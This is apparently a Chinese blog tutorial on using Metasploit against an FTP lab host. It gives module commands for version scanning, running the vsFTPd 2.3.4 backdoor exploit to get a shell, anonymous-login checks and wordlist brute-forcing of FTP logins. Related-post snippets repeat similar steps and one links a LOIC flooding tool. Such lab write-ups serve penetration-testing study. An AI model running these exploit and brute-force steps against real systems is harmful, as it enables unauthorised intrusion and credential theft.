msf利用ftp协议进行信息搜集

最新推荐文章于 2024-01-18 17:15:28 发布
最新推荐文章于 2024-01-18 17:15:28 发布
阅读量779 收藏 3
点赞数
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Deeeelete/article/details/104411676
版权

1.使用ftp_version查看信息
搜索模块
msf5 > search ftp_version
在这里插入图片描述
使用模块,查看信息
msf5 > use auxiliary/scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > show options
在这里插入图片描述
msf5 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.132.180
msf5 auxiliary(scanner/ftp/ftp_version) > set THREADS 14
msf5 auxiliary(scanner/ftp/ftp_version) > run
在这里插入图片描述
扫描处结果是vsFTPd 2.3.4,搜索这个版本
msf5 > search 2.3.4
在这里插入图片描述
加载模块,查看信息
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
在这里插入图片描述
配置信息,run
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.132.180
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run
在这里插入图片描述
进入后可以执行操作

在这里插入图片描述




2:ftp匿名登录扫描
msf5 > use auxiliary/scanner/ftp/anonymous
msf5 auxiliary(scanner/ftp/anonymous) show options
在这里插入图片描述
配置信息
msf5 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.132.180
msf5 auxiliary(scanner/ftp/anonymous) > run
在这里插入图片描述


3:ftp暴力破解
搜索模块
msf5 > search ftp_login
在这里插入图片描述
加载模块,查看配置
msf5 > use auxiliary/scanner/ftp/ftp_login
msf5 auxiliary(scanner/ftp/ftp_login) > show options
在这里插入图片描述
配置信息
sf5 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.132.180
msf5 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf5 auxiliary(scanner/ftp/ftp_login) > run
在这里插入图片描述
这里的脚本因为我实现写入了msfadmin msfadmin所以最后扫描成功了
在这里插入图片描述

网络安全Kali之基于SSH、FTP协议收集信息
xueshenlaila的博客
03-24 6031
基于SSH协议收集信息 查看ssh服务的版本信息 msf6 > use auxiliary/scanner/ssh/ssh_version msf6 auxiliary(scanner/ssh/ssh_version) > show options msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180 msf6 auxiliary(scanner/ssh/ssh_version) > run 对SSH
MSFFTP服务器(匿名登录)扫描
Ethan024的博客
05-31 1478
FTP (File Transfer Protocol) 是一种复杂,但是又缺乏安全性的应用协议。因此是进入目标网络最便捷的途径。因此,每次渗透测试时,都要对FTP服务器进行扫描。 查看配置项: msf6 > use auxiliary/scanner/ftp/ftp_version msf6 auxiliary(scanner/ftp/ftp_version) > show options 设置目标网络进行扫描: sf6 auxiliary(scanner/ftp/ftp_versi
MSF基于FTP协议信息收集
永远是少年
06-07 440
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF基于FTP协议信息收集。 一、FTP服务版本扫描 二、FTP匿名登录扫描
msf-ftp
西部壮仔的博客
03-16 420
use auxiliary/scanner/ftp/ftp_version 收集ftp的版本信息 use auxiliary/scanner/ftp/anonymous 判断是否可以匿名登陆 use auxiliary/scanner/ftp/ftp_login ftp账号密码破解
kali下-MSF-ftp_login模块破解FTP账号及密码
最新发布
mogexiuluo的博客
01-18 1201
metasploit全称是The Metasploit Framework,又称MSF,是Kali 内置的一款渗透测试框架,也是全球最受欢迎的渗透测试工具之一。MSF允许使用者开发自己的漏洞脚本,从而进行测试,它还可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,提供真正的安全风险情报等。MSF框架由多个模块组成,各个模块之间的功能如下:**1、auxiliary(辅助模块)**该模块不会直接在测试者和目标主机之间建立访问,他们只会负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试。
Metasploit渗透测试之信息收集中的FTP协议信息收集技术详解
在渗透测试中,信息收集是至关重要的步骤,能够帮助渗透测试人员获取目标系统的关键信息,为后续的渗透活动奠定基础。 ## 1.1 Metasploit框架简介 Metasploit框架是一套用于开发、测试和执行漏洞利用的平台,其...
kali中使用msf进行信息收集的几种主要方式
weixin_43894771的博客
03-08 640
基于tcp协议收集 1.利用tcp做信息收集 use auxiliary/scanner/discovery/arp_sweep 设置相关属性 rhosts:目标ip therads:线程数 2.半连接方式扫描停tcp接口 use auxiliary/scanner/portscan/syn 设置相关属性 rhosts therads 3.执行密码嗅探 search psnuffle use ...
CTF训练笔记(四)- FTP服务后门利用
morrino的博客
04-19 2908
对于开放了FTP、SSH、Telnet等服务的系统,可以尝试一些对应服务版本的漏洞代码; 对于系统一定要注意利用现成的EXP来拿到靶机root权限。 如果靶机开启了多个服务,貌似有很多不同方法可以拿到root权限,那就用最简单的方法。 本次渗透测试利用了已经存在的EXP直接一步到位地拿到了靶机的root权限,极大地提升了获取flag的速度。 [CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
网络安全:Metasploit 渗透测试之信息收集
weixin_46035615的博客
04-19 3180
网络安全:Metasploit 渗透测试之信息收集 1 基于 TCP 协议收集主机信息 2 基于 SNMP 协议收集主机信息 3 基于 SMB 协议收集信息 4 基于 SSH 协议收集信息 5 基于 FTP 协议收集信息
.MSF爆破 简介:实验利用kali MSFftp_login模块对metasploitable2中ftp服务实施攻击
qq_44122254的博客
03-21 2843
启动msf 使用search搜索ftp_login模块,使用use命令使用 set rhosts 设置IP set user_file /root/Desktop/user.txt设置用户名 set pass_file /root/Desktop/password.txt设置密码 在执行的时候我有出错了一下,我忘记提前建立user和password的爆破文档了 Run进行爆破 这是爆破成功的 如果只是在自己的kali复现漏洞做实验的话,做字典的时候没必要添加太多,浪费时间 ...
msf攻击FTP 服务.docx
04-26
通过图文并茂的方式详细描述了利用msf框架进行ftp攻击的过程,文中包含了命令和步骤,很详细,给初学者作为参考。
SearchFTP
03-16
使用SYN扫描加快速度 取每个根目录内容 结果另存为HTML文档
实验四:MSF渗透测试之FTP漏洞模块
weixin_45822468的博客
01-12 1189
这里有两个目录很重要。bash_history,因为它保存用户运行过的所有命令的历史记录。例如,可以找到有关用户 ID、密码、机密文件的信息名称、位置、服务器名称和共享文件夹。来显示当前目录和子目录以及我们对目录的权限的列表。如果特定版本没有任何公开漏洞,那么我们可以尝试使用字典攻击来查找有效的用户名和密码。这一步即使不知道ftp的username和password也可以得到一些信息。2.尝试通过控制台连接到FTP服务器 查看服务器版本信息和操作系统。1.可以使用hydra爆破ftp服务器的用户名和密码。
kali msfadmin ftp_login爆破
white_or_abc的博客
03-20 810
利用kali爆破metaspolit 首先建立字典 然后用msfconsole打开msf模式 然后用命令设置远程主机地址, 用指令show options查看是否是user_file等, 将词典引入,并run爆破
MSF针对FTP的后门攻击危害
永远是少年
06-07 901
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF针对FTP的后门攻击危害。 一、模块使用 二、参数设定与执行 三、结果查看
口令暴力破解--Ftp协议暴力破解与Ssh协议暴力破解
薛定谔的猫
04-12 5696
服务器收到请求之后,先在该服务器上你的主目录下寻找你的公用密匙,然后把它和你发送过来的公用密匙进行比较。同时如果服务器没有其他安全限制,如登录来源IP,账户登录错误次数,则会可能存在被暴力破解的可能。打开kali-linux命令行窗口,输入ssh admin@193.168.1.26,任意输入用户名密码,提示访问被阻止。尝试登录FTP服务器,打开kali系统终端,输入ftp 193.168.1.23,随后输入上面获取的用户名和密码。输入search ftp_login,搜索ftp_login模块。
利用Kali的ftp_login模块破解ftp口令
MAY的博客
04-13 1716
破解Office加密文档、RAR加密文档口令
FTP弱口令渗透测试
明裕学长的博客
05-24 3137
任务环境说明: 服务器场景:Windows 服务器场景操作系统:Windows(版本不详) 渗透机环境说明: BT5渗透机用户名:root密码:toor Kali渗透机用户名:root密码:toor Windows7渗透机用户名:administrator密码:123456 靶机场景Windows--1 172.16.105.249 1.在BT5中使用Zenmap工具扫描服务器场景Windows所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、2
LOIC网站压力测试工具
热门推荐
Deeeelete的博客
02-02 2万+
官网下载:https://sourceforge.net/projects/loic/ 百度云:https://pan.baidu.com/s/1VVUjLqtq1mMAD-TJIAnhnQ 1.软件解压后运行,界面如图 2.然后可以在url处输入想要测试的网站网址,也可以输入ip地址,输入完之后要点击右侧的lock on,输入的网站地址会自动填充到selected target中。 3.下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deeeelete

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值